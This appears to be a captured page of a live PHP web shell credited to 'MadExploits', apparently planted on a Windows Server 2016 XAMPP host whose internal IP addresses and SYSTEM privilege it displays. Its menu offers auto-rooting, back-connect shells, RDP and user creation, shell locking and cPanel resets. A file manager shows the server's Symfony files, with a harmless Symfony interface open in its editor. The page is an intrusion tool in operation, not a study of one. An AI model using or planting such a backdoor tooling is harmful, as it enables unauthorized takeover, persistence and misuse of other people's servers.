Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
vendor /
symfony /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
Definition
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
Loader
[ DIR ]
drwxrwxrwx
Resource
[ DIR ]
drwxrwxrwx
Util
[ DIR ]
drwxrwxrwx
CHANGELOG.md
3.22
KB
-rw-rw-rw-
ConfigCache.php
1.55
KB
-rw-rw-rw-
ConfigCacheFactory.php
1.26
KB
-rw-rw-rw-
ConfigCacheFactoryInterface.ph...
961
B
-rw-rw-rw-
ConfigCacheInterface.php
1.3
KB
-rw-rw-rw-
FileLocator.php
2.46
KB
-rw-rw-rw-
FileLocatorInterface.php
1.01
KB
-rw-rw-rw-
LICENSE
1.04
KB
-rw-rw-rw-
README.md
632
B
-rw-rw-rw-
ResourceCheckerConfigCache.php
5.52
KB
-rw-rw-rw-
ResourceCheckerConfigCacheFact...
1.22
KB
-rw-rw-rw-
ResourceCheckerInterface.php
1.35
KB
-rw-rw-rw-
composer.json
1.21
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ConfigCacheFactoryInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; /** * Interface for a ConfigCache factory. This factory creates * an instance of ConfigCacheInterface and initializes the * cache if necessary. * * @author Matthias Pigulla <mp@webfactory.de> */ interface ConfigCacheFactoryInterface { /** * Creates a cache instance and (re-)initializes it if necessary. * * @param string $file The absolute cache file path * @param callable $callable The callable to be executed when the cache needs to be filled (i. e. is not fresh). The cache will be passed as the only parameter to this callback * * @return ConfigCacheInterface The cache instance */ public function cache($file, $callable); }
Close